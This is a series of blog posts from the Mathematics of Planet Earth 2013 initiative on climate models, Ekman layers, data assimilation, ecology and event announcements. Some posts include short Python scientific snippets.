    Surprisingly often, mathematics can offer perspectives that complement or provide insight into the results of observations and large-scale computational experiments. Through inspired model reduction and sometimes just clever guessing, it is often possible to come up with relatively simple models for components of the climate system that still retain some essential features observed in the physical world, that reproduce complex phenomena quite faithfully, and that lead to additional questions. The two figures on the right illustrate a simple energy balance model for the entire planet. It posits that the solar energy reaching the Earth must balance the energy that the Earth radiates back into outer space; otherwise, the planet will heat up or cool down. The model focuses on the global mean surface temperature and reproduces the current state of the climate system remarkably well with just a few physical parameters (solar output, reflectivity of the Earth’s surface, greenhouse effect). The model also shows that the Earth’s climate system can have multiple stable equilibrium states. One of these states is the “Snowball Earth” state, where the entire planet is covered with snow and ice and temperatures are well below freezing everywhere. Why is the planet at today’s climate when much colder climates are also possible? Has the planet ever been in one of the much colder climate states in the past? (The answer is yes.) Is there any danger that Earth could again revert to a much colder climate in the future? How would this happen? Mathematics can raise these questions from a very simple climate model and also support or rule out certain answers using an analysis of the model.
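
    To make the energy balance concrete, here is a minimal sketch with standard textbook numbers (the solar constant, the planetary albedo, and an effective emissivity standing in for the greenhouse effect); none of these values is taken from the book excerpt.

    # Zero-dimensional energy balance: (1 - albedo) * S0 / 4 = epsilon * sigma * T**4.
    sigma = 5.67e-8     # Stefan-Boltzmann constant (W m^-2 K^-4)
    S0 = 1361.0         # solar constant (W m^-2)

    def equilibrium_temperature(albedo, epsilon):
        """Global mean surface temperature (K) for a given reflectivity and effective emissivity."""
        return ((1 - albedo) * S0 / (4 * epsilon * sigma)) ** 0.25

    print(equilibrium_temperature(0.30, 1.00))   # ~255 K: no greenhouse effect at all
    print(equilibrium_temperature(0.30, 0.61))   # ~288 K: effective emissivity mimicking the greenhouse effect
    print(equilibrium_temperature(0.62, 1.00))   # ~219 K: a high-albedo, "Snowball Earth"-like state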

    Posted in Climate Modeling, Mathematics | Leave a comment

    Stochastics in Geophysical Fluid Dynamics

    A workshop is taking place this week at the American Institute of Mathematics (AIM) in Palo Alto, California, on “Stochastics in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings.”

    This workshop is co-organized by Nathan Glatt-Holtz (Institute of Mathematics and Its Applications, IMA, University of Minnesota, on leave from Virginia Tech), Boris Rozovskii (Brown University), Roger Temam (Indiana University) and Joseph Tribbia (National Center for Atmospheric Research, NCAR). The workshop brings together 30 researchers from the geophysical fluid mechanics, partial differential equations, and probability communities. Two formal lectures are given in the mornings; open discussion sessions take place in the afternoons.

    On Monday, the opening day of the workshop, Joseph Tribbia gave the first lecture on the use of stochastics to represent uncertainties in data and models. In the second lecture, Mohammed Ziane described the current state of the mathematical theory of the deterministic Primitive Equations of the atmosphere/ocean system, which play a central role in many General Circulation Models. The afternoon was devoted to a lively discussion in which members of each of the three communities represented at the workshop had the opportunity to ask questions, request explanations and clarifications from members of the other communities, and make suggestions for future interactions and collaborations.

    Nathan Glatt-Holtz, Boris Rozovskii, Roger Temam, and Joe Tribbia

    Posted in Geophysics, Mathematics | Leave a comment

    It’s a Math Eat Math World

    A book review in the January 11 issue of Science magazine begins with a wonderful line: “It is not often that mathematical theory is tested with a machine gun.”

    The book under review is “How Species Interact: Altering the Standard View on Trophic Ecology,” by Roger Arditi and Lev R. Ginzburg (Oxford University Press, 2012). In it, according to reviewer Rolf O. Peterson at the School of Forest Resources and Environmental Science at Michigan Technological University, the authors argue in favor of a theory they developed in the 1980s, that predator-prey dynamics, which is classically viewed as principally depending on prey density, is better viewed as depending on the ratio of prey to predator. “I admit to being impressed by the immediate usefulness of viewing predation through ratio-dependent glasses,” Peterson writes.

    The details of the debate lie within the equations, which Peterson, quoting from the classic essay, “The Unreasonable Effectiveness of Mathematics in the Natural Sciences” by Eugene Wigner, calls a “wonderful gift.” (Peterson ruefully adds that many of his colleagues in wildlife management “have an unfortunate phobia for all things mathematical.” “Trophic” ecology, by the way, is rooted in the Greek word “trophe,” for “nourishment.” It is basically the study of food chains, which are mathematical from top to bottom.) The two “sides” of the debate may actually lie at opposite ends of a spectrum, with prey density predominating when predators are rare and the prey-to-predator ratio taking over when predators become dense enough themselves to interfere or compete with one another. The best course mathematically may be to take a page from the fundamentalists and “teach the controversy.”
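
    For readers who want to see where the equations differ, the standard prey-dependent (Holling type II) and ratio-dependent (Arditi-Ginzburg) per-predator consumption rates can be written side by side; this is textbook material, not quoted from the book under review:
    $$g_{\mathrm{prey}}(N) = \frac{aN}{1 + ahN}, \qquad g_{\mathrm{ratio}}(N,P) = \frac{a\,N/P}{1 + ah\,N/P},$$
    where $N$ is prey density, $P$ is predator density, $a$ is an attack rate and $h$ a handling time. In the first form the rate depends on prey density alone; in the second, interference among predators makes the rate depend on the prey available per predator. The total predation rate is $P\,g$ in either case, and the two models diverge as $P$ grows, which is exactly the spectrum Peterson describes.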

    As for the machine gun, you’ll want to read Peterson’s review, which, if you subscribe to Science, is available here — suffice it here to say, it has something to do with wolves, Alaska, and aircraft. But the story predates Sarah Palin by a couple of decades.

    Barry Cipra

    Posted in Ecology, General | Leave a comment

    Ice Floes, Coriolis Acceleration and Estimating the Viscosity of Air and Water

    I have wanted to run this story down since I saw the reference in Lamb’s Hydrodynamics to a paper by G. I. Taylor that contains a description of what oceanic and atmospheric scientists call “Ekman layers.” Physical oceanographers learn early in their careers that the Norwegian oceanographer Fridtjof Nansen, on the Fram expedition of 1893-1896, noted that ice floes tend to drift to the right of the wind, and suggested to his colleague Vilhelm Bjerknes that the problem be assigned to a student. Bjerknes chose Ekman, who came up with the result associated with his name. Ekman’s result can be found in lots of places, e.g., the Wikipedia page on Ekman layers or just about any text on physical oceanography, e.g. Knauss, Introduction to Physical Oceanography. Ekman explained the crosswind transport of ice floes by assuming a balance of Coriolis acceleration and viscous drag. The bare bones of the derivation go like this:

    Steady flow governed by a balance of Coriolis force and viscous drag looks like this:
    \begin{align*}
    -fv &= \nu u_{zz}\\
    fu &= \nu v_{zz}\\
    f &= 2\Omega \sin \phi
    \end{align*}
    where $(u,v)$ are the horizontal velocity components, $\Omega = 2\pi/86400\ \mathrm{s}^{-1}$ is the angular rotation rate of the earth, $\phi$ is the latitude and $\nu$ is the viscosity, about which more later. For the flow near the ocean surface, the vector wind stress $(\tau^{(x)},\tau^{(y)})$ enters as a boundary condition $(\tau^{(x)},\tau^{(y)}) = \nu (u,v)_z$. The trick is to divide by $\nu$ on both sides, multiply the first equation by $i$ and add it to (and subtract it from) the second, yielding the complex conjugate scalar ODEs
    \begin{align*}
    &(u+iv)_{zz}-i(f/\nu)(u+iv) = 0\\
    &(u-iv)_{zz}+i(f/\nu)(u-iv) = 0
    \end{align*}
    These equations are readily solved to find
    \begin{align*}
    u &= \frac{\sqrt{2}}{fd}e^{z/d}\left ( \tau^{(x)}\cos(z/d -\pi /4) -\tau^{(y)}\sin(z/d - \pi /4)\right)\\
    v &= \frac{\sqrt{2}}{fd}e^{z/d}\left ( \tau^{(x)}\sin(z/d -\pi /4) +\tau^{(y)}\cos(z/d - \pi /4) \right)
    \end{align*}
    where $d=(2\nu /f)^{1/2}$. Integrating over the water column from $z=-\infty$ to $z=0$ yields the result that transport is to the right of the wind. If you draw the two-component current vectors at each depth as arrows, with the tails on the $z$-axis, you will see that the heads trace out a nice spiral. There are pictures in lots of places, e.g. the Wikipedia page on Ekman layers.
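
    To visualize the spiral, one can simply evaluate the solution; the values of $f$, $\nu$ and the stress below are illustrative guesses, not taken from the text.

    import numpy as np

    # Illustrative values (not from the text): a mid-latitude Coriolis parameter, an eddy
    # viscosity, and an eastward kinematic wind stress (stress already divided by density).
    f = 1.0e-4                    # Coriolis parameter (1/s)
    nu = 1.0e-2                   # eddy viscosity (m^2/s)
    tau_x, tau_y = 1.0e-4, 0.0    # kinematic surface stress (m^2/s^2)
    d = np.sqrt(2 * nu / f)       # Ekman depth scale (m)

    z = np.linspace(-5 * d, 0.0, 500)
    u = (np.sqrt(2) / (f * d)) * np.exp(z / d) * (tau_x * np.cos(z / d - np.pi / 4)
                                                  - tau_y * np.sin(z / d - np.pi / 4))
    v = (np.sqrt(2) / (f * d)) * np.exp(z / d) * (tau_x * np.sin(z / d - np.pi / 4)
                                                  + tau_y * np.cos(z / d - np.pi / 4))

    dz = z[1] - z[0]
    print(np.trapz(u, dx=dz), np.trapz(v, dx=dz))   # approximately (0, -tau_x/f)

    The surface current comes out $45^{\circ}$ to the right of the wind, and the depth-integrated transport $90^{\circ}$ to the right, consistent with Nansen’s observation that the floes drift to the right of the wind.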

    Oceanographers talk casually about Ekman layers and Ekman transports, but, to be precise, Ekman layers do not appear in nature. The real atmosphere and ocean are turbulent. Vertical momentum transfers do not occur by simple diffusion, and characterization of penetration of surface stress into the interior fluid by a simple scalar diffusion coefficient is only the crudest approximation. Ekman knew this. He noted that if he used the measured viscosity of sea water for $\nu$ and typical wind stress magnitudes for $\tau^{(x,y)}$ the surface layer would be less than a meter thick. He did not refer to the work of Reynolds on turbulence, and much of Ekman’s dissertation is concerned with trying to model flow in the real ocean in terms of the mathematical tools available to him.

    G. I. Taylor was apparently unaware of Ekman’s work when he applied the same analytical machinery to form an expression for the surface velocity profile in the atmospheric surface boundary layer. (Taylor, 1915: Eddy motion in the atmosphere, Phil. Trans. R. Soc. Lond. A., 215). Taylor was interested in quantifying the transport of physical properties by macroscopic eddies, i.e., he wanted to estimate what we now recognize as eddy diffusivity and eddy viscosity. Taylor compared the solutions of his equations to observations taken from balloons and backed out estimates of kinematic viscosities varying over an order of magnitude, between about $3\cdot 10^4$ and $6 \cdot 10^4 \mathrm{cm}^2 / \mathrm{sec}$ over land, and between $7.7\cdot 10^2$ and $6.9\cdot 10^3 \mathrm{cm}^2 / \mathrm{sec}$ over water. The molecular kinematic viscosity of air, by comparison, is more like $0.15\ \mathrm{cm}^2 / \mathrm{sec}$. The sixth edition of Lamb’s Hydrodynamics contains discussions of both Ekman’s and Taylor’s work. It’s just as well that we refer to “Ekman layers” rather than “Taylor layers.” Ekman was first, after all.

    Richardson, in his (1922) book “Weather Prediction by Numerical Process,” laid out specific methodology for numerical weather prediction. Richardson was a man far before his time. He could not have conceived of an electronic computer — his book was published decades before the work of Turing and von Neumann. He imagined that numerical weather prediction would be done by great halls full of people working the mechanical calculators of the day. Richardson understood that he would need to specify the viscosity of air, and, after examining the results available to him, including Taylor’s work, he concluded that air is slightly more viscous than Lyle’s Golden Syrup and slightly less viscous than shoe polish.

    Ninety years after the publication of Richardson’s book, we have come a very long way, but we still don’t know how to deal with turbulent transports in models of the ocean and atmosphere.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Atmosphere, Geophysics, Mathematics, Ocean | Leave a comment

    The New Math

    Why has the MPE2013 movement been popular with mathematicians? The traditional view of mathematicians is that they like to work in solitude and that there is a great divide between pure and applied mathematicians. So how has MPE2013, a massive collaborative effort on the part of pure and applied mathematical scientists, managed to bridge this chasm? It seems to me that there has never before been such a unified effort on the part of the mathematical sciences community, nor has the level and scale of collaboration been so apparent. To give you an idea of the scope, this year in MPE there will be more than 10 long-term programs, 60 workshops, dozens of special sessions at society meetings, two big lecture series, summer and winter schools for graduate students, research experiences for undergraduates, an art competition and traveling exhibition, and the promise that high-quality curriculum materials for all ages and grades will be developed this year—all of this coordinated by the more than 120 partner organizations. I’m pretty sure this level of effort and cooperation is unprecedented in the annals of mathematics.

    I think there are two explanations for the success of this initiative. One is that mathematical scientists have become far more collaborative than they used to be. Fifty years ago the average number of co-authors was 1.3 researchers per paper. Now it is more than 2. While it is common in the experimental sciences to have dozens or even a hundred co-authors on a single publication, the record in pure mathematics until a few years ago was surely fewer than 10. There were 28 co-authors on a paper recently posted to the arXiv, which is now believed to be the record. This new degree of collaboration is undoubtedly due to the internet, the computer age, the ease of collaboration, and the fact that more and more workshops are devoted to creating and promoting collaborations.

    The second explanation is that it is becoming clearer to mathematicians that they have something tangible, something important to offer to the consideration of the problems of the planet. Many of the issues such as weather, climate, climate change, spread of disease, natural hazards and financial distortions lead to the creation of seriously complex mathematical models. Computers can quickly give us far more data than before, which leads to feedback and refinements of the models. Importantly, this process has also opened the door to new mathematical ideas that can enhance the modeling process. I am amazed by the way that pure mathematics can help with problems which were previously considered the sole domain of applied mathematics with its stock set of tools and methods. G. H. Hardy, the British
    number theorist, used to pride himself on his subject being so pure that there was virtually no chance for applications. But the fact that finding large prime numbers is easy, whereas factoring large composite numbers is hard, paved the way for the current ubiquity of internet security algorithms based on number theory. Large data sets can now be analyzed using algebraic topology to model the clusters. Statistics has been invaded by algebraic geometry. The high-brow theory of percolation within statistical mechanics is used to study ice. Modeling phase transitions is a seriously complicated endeavor that uses some of the most sophisticated mathematics around. Uncertainty quantification is a new field that can give new information about the likelihood of rare events occurring. Data assimilation is another important new tool. Perhaps it is becoming clearer that there is the opportunity for pure mathematicians to apply their know-how in ingenious ways to weigh in on some of the big problems that we face. Having a role for all mathematical scientists, I think, is the second factor that accounts for the apparent success of the MPE2013 initiative.

    A word of warning: mathematics moves slowly. We can’t expect great results from just one year of work. But we are off to a great start!

    Brian Conrey, Director
    American Institute of Mathematics
    conrey@aimath.org

    Posted in General, Mathematics | Leave a comment

    Recommended Reading

    Earlier this week, I had the good fortune to attend a talk here in Washington, DC, by former Vice-President Al Gore on “The Future, Six Drivers of Global Change.” This is the title of his latest book, which had just appeared. The talk was sponsored by my favorite bookstore, “Politics and Prose.”

    Mr. Gore is an excellent speaker, and I enjoyed hearing his vision of the future. The six drivers of global change, which are reflected in the chapter titles of the book, are Earth Inc. (the global economy, outsourcing, and robosourcing), the global mind (a planet-wide digital network and the “world brain”), power in the balance (the changing political equilibrium), outgrowth (natural resources and the integrity of our ecological system), the reinvention of life and death (the Life Sciences Revolution), and the edge (climate change). I will not try to summarize his theses; the book is worth your time if you are interested in this sort of thing, and the price is right (US $30).

    My first move after acquiring the book was to check the Index, to see whether mathematics would be mentioned. I was not disappointed: one double entry “mathematics, mathematicians, xix, 209”. The text on page xix refers to the nature of fractal equations and the phenomenon of “self-sameness.” (I think we prefer the term “self-similarity”.) Alas, the text on page 209 is in the context of a discussion of the US educational system and its waning in “science, math, and engineering.” But Mr. Gore talked at length about complex systems using the right terms and about our climate system using the right numbers, so I am fairly confident that he has the facts correct. Anyway, the book is recommended reading for all mathematicians (and others) interested in Planet Earth in 2013 and beyond.

    Posted in Climate Change, Complex Systems, General, Social Systems, Sustainability | Leave a comment

    MPE Australia Launched!

    With a packed lecture theatre and the atmosphere to match, yesterday’s launch of Australia’s participation in Mathematics of Planet Earth was the big red-carpet event for maths and stats.

    Australian Chief Scientist, Professor Ian Chubb, opened the proceedings by discussing the growing demand for mathematical and statistical skills in the Australian workforce. He then set the scene for the year: to demonstrate to the public that mathematics underpins every aspect of our culture, science and economy, and challenged us all to refute the claim that mathematics has little relevance to society.

    Following the official launch, Professor Simon Levin, Princeton University, delivered the first in the international series of Mathematics of Planet Earth public lectures sponsored by the Simons Foundation. The lecture, entitled “The Challenge of Sustainability and the Promise of Mathematics,” opened our eyes to the parallels between financial systems, ecological systems and governments. Professor Levin demonstrated the immense power – and limitations – of mathematics as a tool for predicting the behaviour of these systems, and hinted at how we might identify the signs of impending crisis. Many were amused by Levin’s question, posed in an early-2008 paper published in Nature: “Who knows, for instance, how the present concern over sub-prime loans will pan out?”

    The lecture concluded with a discussion about models of collective behaviour, and how these may apply to achieving global consensus on environmental issues. Global cooperation really is the holy grail for achieving sustainability, and it seems that mathematics will play a central role. And it all starts with Mathematics of Planet Earth. As Professor Chubb put it, “This year is important for the whole of humanity.”

    Posted in General, Public Event | Leave a comment

    Presidential Inauguration 2013

    Like four years ago, my good friend David Levermore (U Maryland) and I joined the crowd that gathered on the National Mall in Washington, DC, yesterday to be part of the inauguration of President Barack Obama. It was a great experience sharing in the excitement as the crowd responded to introductions and stirring prose.

    Here is a paragraph that relates directly to what MPE2013 is all about:

    “We, the people, still believe that our obligations as Americans are not just to ourselves, but to all posterity. We will respond to the threat of climate change, knowing that the failure to do so would betray our children and future generations. Some may still deny the overwhelming judgment of science, but none can avoid the devastating impact of raging fires, and crippling drought, and more powerful storms. The path towards sustainable energy sources will be long and sometimes difficult. But America cannot resist this transition; we must lead it. We cannot cede to other nations the technology that will power new jobs and new industries – we must claim its promise. That is how we will maintain our economic vitality and our national treasure – our forests and waterways; our croplands and snowcapped peaks. That is how we will preserve our planet, commanded to our care by God. That’s what will lend meaning to the creed our fathers once declared.”

    This was also probably the first inaugural address to mention mathematics and science:

    “No single person can train all the math and science teachers we’ll need to equip our children for the future, or build the roads and networks and research labs that will bring new jobs and businesses to our shores.”

    Hans Kaper
    Georgetown University
    kaper@mathclimate.org

    Posted in General, Political Systems, Public Event | Leave a comment

    Our Changing Shoreline: Modeling the Effects of Storm Surges on Coastal Vegetation

    The unprecedented storm surge from Hurricane Sandy was enough to shift coastal shorelines along New York and New Jersey. One barrier island, Fire Island, off the southern coast of Long Island, N.Y., for example, traveled as much as 85 feet inland when the island’s dune eroded as a result of the storm.

    Storm surges associated with sea level rise are important predicted consequences of global climate change and have the potential for severe effects on the vegetation of low-lying coastal areas. Ocean water intrusion through storm surges can affect large areas in a short period of time, as we have seen recently with Hurricane Sandy.

    The question of how these storm surges affect coastal areas can be addressed mathematically and is the focus of award-winning research by Dr. Jiang Jiang, a postdoctoral fellow at the National Institute for Mathematical and Biological Synthesis (NIMBioS).

    Predicting the likelihood of vegetation regime shifts requires detailed modeling of coupled ecological-hydrologic processes. Jiang’s recent work was awarded first prize in the MCED Award for Innovative Contributions to Ecological Modelling. MCED, which stands for Modelling Complex Ecological Dynamics, is a textbook presenting an overview of approaches and applications in ecological modeling. The textbook editors organize the annual award as a part of the Ecological Society of Germany, Austria and Switzerland (GfÖ) awards. The intention of the MCED award, which is given to young modelers who have finished their degree within the last three years, is to foster the development and application of modern ecological modeling methods that can help to expand the understanding of complex ecological dynamics.

    For Jiang’s winning project, “Modelling the emergence of self-stabilising sharp boundaries in ecotones of coastal marshland communities,” Jiang developed a model that coupled vegetation dynamics with hydrology and salinity to study factors that might affect vegetation in low-lying coastal areas.

    Modeling techniques used in the study are among the first to couple vegetation dynamics with hydrology and salinity to study the factors affecting coastal vegetation in areas where vegetation changes abruptly, called ecotones. In disentangling the mechanisms that maintain the stability of ecotones of coastal vegetation, the study reveals that the salinity, caused by tidal flux, is the key factor separating vegetation communities, while a self-reinforcing feedback is the main factor for creating the sharpness of coastal boundaries.
    The finding is indeed new for coastal wetland ecology and has implications for future research. Also, the model developed in the study is a new and interesting tool that will likely attract the attention of wetland ecologists who could use it to make better projections of possible changes in coastal vegetation due to storm surges.

    Work related to Jiang’s award-winning entry has appeared in two published papers –

    Jiang J, DeAngelis DL, Smith TJ, Teh SY, Koh HL. 2012. Spatial pattern formation of coastal vegetation in response to hydrodynamics of soil pore water salinity: A model study. Landscape Ecology 27:109-119 [online].

    Jiang J, Gao D, DeAngelis DL. 2012. Towards a theory of ecotone resilience: Coastal vegetation on a salinity gradient. Theoretical Population Biology 82:29-37 [online].

    Posted in Ecology, Mathematics, Natural Disasters | Leave a comment

    Mathematics of Planet Earth Australia 2013

    The Australian Mathematical Sciences Institute (AMSI) has partnered with societies and organisations across Australia to celebrate the important role mathematics and statistics play in today’s society.

    The Australian program will be launched on 29 January 2013 by Australia’s Chief Scientist and patron of the year, Professor Ian Chubb, and by Professor Simon Levin of Princeton University. This event is sponsored by the Simons Foundation.

    Professor Trachette Jackson from The University of Michigan gave the first in the MPE Australia Public Lecture series in Sydney on 8 January. She spoke about the essential role of mathematical biology in the 21st century.

    WEBSITE

    MPE Australia’s interactive website provides a forum for academics, university students, school children and the public to discuss, explore and celebrate everyday applications of maths and stats in the real world. With blog posts on topics ranging from the mathematics of body surfing to the impacts of the Black Saturday smoke plume on global weather patterns, there is something for everyone!

    Throughout the year we’ll also be having a coffee with some of Australia’s top maths minds.

    COMPETITIONS & ACTIVITIES

    Online puzzles and resources for both primary and secondary school teachers will bring MPE to Australian classrooms. On Pi Day students will learn about the intricacies of this important number and in Science Week will learn how to use shadows to measure the circumference of the earth.

    The first photography competition “Singling out Symmetry” has been launched. Each competition round will be announced via the website.

    EVENTS

    A series of MPE-sponsored scientific workshops will also run throughout the year. Topics include the mathematics of transportation networks, ecology and statistics, and the modelling of tumours.

    MPE Australia 2013, a major mid-year scientific conference, will explore the themes of a planet at risk and a planet organised by humans. We will bring together researchers from various fields to build research collaborations and explore the role of mathematics and statistics in extreme events, demographics, earth systems, invasive species, large data sets, complex networks and the role of data in the world.

    These events, and more, will be advertised on the MPE Australia website.

    Posted in General, Public Event | Leave a comment

    The Discovery of Global Warming

    “As a dam built across a river causes a local deepening of the stream, so our atmosphere, thrown as a barrier across the terrestrial rays, produces a local heightening of the temperature at the Earth’s surface.” Thus in 1862 John Tyndall described the key to climate change. He had discovered in his laboratory that certain gases, including water vapor and carbon dioxide (CO${}_2$), are opaque to heat rays. He understood that such gases high in the air help keep our planet warm by interfering with escaping radiation.
     
    This kind of intuitive physical reasoning had already appeared in the earliest speculations on how atmospheric composition could affect climate. It was in the 1820s that a French scientist, Joseph Fourier, first realized that the Earth’s atmosphere retains heat radiation. He had asked himself a deceptively simple question, of a sort that physics theory was just then beginning to learn how to attack: what determines the average temperature of a planet like the Earth? When light from the Sun strikes the Earth’s surface and warms it up, why doesn’t the planet keep heating up until it is as hot as the Sun itself? Fourier’s answer was that the heated surface emits invisible infrared radiation, which carries the heat energy away into space. He lacked the theoretical tools to calculate just how the balance places the Earth at its present temperature. But with a leap of physical intuition, he realized that the planet would be significantly colder if it lacked an atmosphere. (Later in the century, when the effect could be calculated, it was found that a bare rock at Earth’s distance from the Sun would be well below freezing temperature.)

    How does the Earth’s blanket of air impede the outgoing heat radiation? Fourier tried to explain his insight by comparing the Earth with its covering of air to a box with a glass cover. That was a well-known experiment: the box’s interior warms up when sunlight enters while the heat cannot escape. This was an overly simple explanation, for it is quite different physics that keeps heat inside an actual glass box, or similarly in a greenhouse. (As Fourier knew, the main effect of the glass is to keep the air, heated by contact with sun-warmed surfaces, from wafting away. The glass does also keep heat radiation from escaping, but that’s less important.) Nevertheless, people took up his analogy, and the trapping of heat by the atmosphere eventually came to be called “the greenhouse effect.”

    Source: American Institute of Physics

    Posted in General | Leave a comment

    MPE Mexican launch

    Tomorrow, January 18, 2013, marks the launch of the Mathematics of Planet Earth year in Mexico. The ceremony will be held at CIMAT (Guanajuato) at 5:30 p.m. during the closing of the “6º Taller de Solución de Problemas Industriales.” Luis Montejano, president of the SMM, and José Antonio de la Peña, director of CIMAT, will present MPE to the mathematical community.

    Posted in General, Public Event | Tagged | Leave a comment

    Global Warming — Recommended Reading

    Global warming, one of the most important science issues of the 21st century, challenges the very structure of our society. It touches on economics, sociology, geopolitics, local politics, and individuals’ choice of lifestyle. For those interested in learning more about the complexities of both the science and the politics of climate change, I recommend a nice little book by Mark Maslin, “Global Warming, A Very Short Introduction,” published by Oxford University Press, 2009 (ISBN 978-0-19-954824-8).

    Mark Maslin FRGS, FRSA is a Professor of Climatology at University College London. His areas of scientific expertise include the causes of past and future global climate change and its effects on the global carbon cycle, biodiversity, rainforests and human evolution. He also works on monitoring land carbon sinks using remote sensing and ecological models, and on international and national climate change policies.

    Posted in Climate Change, General | Leave a comment

    From the JMM – Data Assimilation and the Mathematics of Planet Earth and Its Climate

    This session, organized by Thomas Bellsky, Arizona State University, and Lewis Mitchell, University of Vermont, focused on applications of data assimilation to climate issues. It opened with a talk by Chris Jones of the University of North Carolina at Chapel Hill, who gave a wonderful overview of data assimilation and how it can be used in climate models. He also detailed the Lagrangian data assimilation problem from a Bayesian viewpoint. Of particular interest was the discussion of new techniques for making subsurface ocean observations, and how these data can be used to initialize climate models.

    The second speaker of the session was Juan Restrepo of the University of Arizona. Speaking to a large audience, Juan discussed how to determine whether high temperatures in Moscow are an extreme climate fluctuation or the result of a systematic global warming trend. He detailed the challenges in determining such a trend, including inherent multi-scale effects, nonlinear effects, and incomplete knowledge of the climate. He introduced his group’s mathematical methodology for identifying such trends, a method capable of dealing with multi-scale time series.

    Elaine Spiller of Marquette University spoke on data assimilation applied to a simple kinematic model of a three-dimensional ocean eddy. Her methods fit a bias function modeling the difference between such a kinematic model and the data, and then use the bias-corrected kinematic model to explore eddy dynamics. Marc Kjerland of the University of Illinois at Chicago discussed techniques for obtaining the evolution of the slow variables for a simple two-scale climate model, to then obtain a correction term for the fast dynamics. A short discussion period was held to informally discuss research, with a focus on the Math Climate Research Network (MCRN) and future MPE2013 events. Lewis Mitchell spoke after the break on finite-size Lyapunov exponents and data assimilation, focusing on systems with slow and fast regimes. Thomas Bellsky spoke on methods for targeting observations with Ensemble Kalman filter techniques. He also spoke on new parameter estimation techniques, and on why this research matters for future climate modeling as a way to establish a more rigorous methodology for tuning model parameters.
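
    To make the data assimilation theme a little more concrete, here is a minimal sketch of the perturbed-observation Ensemble Kalman Filter analysis step, the basic building block behind the EnKF techniques mentioned above. It does not reflect any speaker’s actual implementation; the tiny three-variable state, the single observed component, and all parameter values are illustrative assumptions.

    ```python
    import numpy as np

    def enkf_analysis(ensemble, y_obs, H, obs_cov, rng):
        """Perturbed-observation EnKF analysis step.

        ensemble : (n_state, n_members) array of forecast states
        y_obs    : (n_obs,) observation vector
        H        : (n_obs, n_state) linear observation operator
        obs_cov  : (n_obs, n_obs) observation-error covariance
        """
        n_state, n_members = ensemble.shape
        x_mean = ensemble.mean(axis=1, keepdims=True)
        X = (ensemble - x_mean) / np.sqrt(n_members - 1)   # state anomalies
        Y = H @ X                                           # observation-space anomalies
        # Kalman gain built from sample covariances
        K = X @ Y.T @ np.linalg.inv(Y @ Y.T + obs_cov)
        # Perturb the observation for each member (the "stochastic" EnKF variant)
        perturbed = y_obs[:, None] + rng.multivariate_normal(
            np.zeros(len(y_obs)), obs_cov, size=n_members).T
        return ensemble + K @ (perturbed - H @ ensemble)

    # Tiny illustrative use: a 3-variable state, observing only the first component.
    rng = np.random.default_rng(0)
    ens = rng.normal(size=(3, 20))              # 20-member forecast ensemble
    H = np.array([[1.0, 0.0, 0.0]])             # observe x[0]
    R = np.array([[0.1]])                       # observation-error variance
    analysis = enkf_analysis(ens, np.array([0.5]), H, R, rng)
    print(analysis.mean(axis=1))                # posterior ensemble mean
    ```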

    DA Session

    Nicholas Allgaier, University of Vermont

    The session wrapped up with talks from Nicholas Allgaier, University of Vermont, and Daniel Vasiliu, College of William and Mary. Nicholas spoke on an empirical model correction procedure that compares short forecasts with a reference truth system in order to calculate state-independent model bias and state-dependent error patterns. Their results suggest that the correction procedure is more effective at reducing error and prolonging forecast usefulness than parameter tuning. Daniel spoke on how the number of variables in data often has no predetermined relationship to the number of observations; his research identifies relationships between certain outcomes and limited data through a novel variable selection procedure, and he detailed further results.

    This session was a great opportunity to both get introduced to some basic concepts from data assimilation and climate science, and to learn about many exciting areas of focused research. Perhaps the best part about such a session is to gather with new and old colleagues to hold further informal discussions over dinner and at future MPE2013 events.

    Posted in Climate Modeling, Conference Report, Data Assimilation, General | Leave a comment

    Mathematical Demography and Population Biology

    In concert with the MPE 2013 initiative, the NSF’s Mathematical Biosciences Institute (MBI) at Ohio State will host the Keyfitz Centennial Symposium on Mathematical Demography in June 2013, cosponsored by the OSU Institute for Population Research (IPR).

    The main goal of the Symposium is to serve as a forum for presentation of ongoing research on the mathematics of population. The program will encompass research on human and non-human populations, and both theoretical and applied research. In bringing together mathematical demographers and population biologists, the symposium will adhere to Keyfitz’s view that population itself is an object worthy of study, not limited to particular species.

    Tony Nance
    Mathematical Biosciences Institute
    tony@mbi.osu.edu

    Posted in General, Public Event, Social Systems | Leave a comment

    From the JMM — Conceptual Climate Models Short Course

    Would you like to learn about conceptual climate models and teach them to your differential equations and modeling classes? Check out the online materials from the MAA Conceptual Climate Models Short Course at the JMM. The course was developed by a team from the Mathematics and Climate Research Network (MCRN) led by postdoc Esther Widiasih. There are recorded lectures, PDF slides and a 37-page workbook of sample exercises.

    The course was 50% lectures and 50% hands-on sessions. The lectures by Hans Kaper introduce global and zonal energy balance models (EBMs), demonstrating how accessible the material is for undergraduates, and including ideas of bistability and bifurcation to a Snowball state. The lecture by Dick McGehee extends the one-dimensional (zonal) EBM to include a dynamic iceline, then explores how well the EBM explains glacial cycles and other features of the paleoclimate record when forced by Milankovitch cycles in Earth’s orbit. The lecture by Esther Widiasih discusses ways to incorporate the effect of CO${}_2$ in the EBM, and related open questions.

    Anna Barry and Esther Widiasih helping participants during a hands-on session.

    Samantha Oestreicher helping a participant during a hands-on session.

    The hands-on sessions, designed to build on each lecture, were run by Esther Widiasih, Anna Barry, Samantha Oestreicher and Dick McGehee. The worksheets include theoretical and computational exercises to develop intuition for the basic EBMs, together with simulations of the EBMs to explore the interplay between energy balance, ice-albedo feedback, Milankovitch cycles in Earth’s orbit, greenhouse gases and other feedback mechanisms. While the exercises are written to be software independent, a MATLAB guide is provided for each worksheet. Some of the participants volunteered to create similar guides using Mathematica and SAGE, so those will be coming to the website soon.
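
    For readers who want a taste of the material before downloading the worksheets, here is a minimal Python sketch of a zero-dimensional (global-mean) EBM with a temperature-dependent albedo. It is not one of the course’s MATLAB guides; the parameter values are generic textbook-style choices, but the run illustrates the bistability (a warm state and a Snowball-like state) discussed in the lectures.

    ```python
    import numpy as np

    SIGMA = 5.670e-8      # Stefan-Boltzmann constant, W m^-2 K^-4
    Q = 342.0             # global-mean insolation (solar constant / 4), W m^-2
    EPS = 0.62            # effective emissivity (a crude greenhouse factor)

    def albedo(T):
        """Temperature-dependent planetary albedo: icy (0.6) below 255 K, warm (0.3) above 280 K."""
        return np.clip(0.6 - 0.3 * (T - 255.0) / 25.0, 0.3, 0.6)

    def dT_dt(T, heat_capacity=4.0e8):
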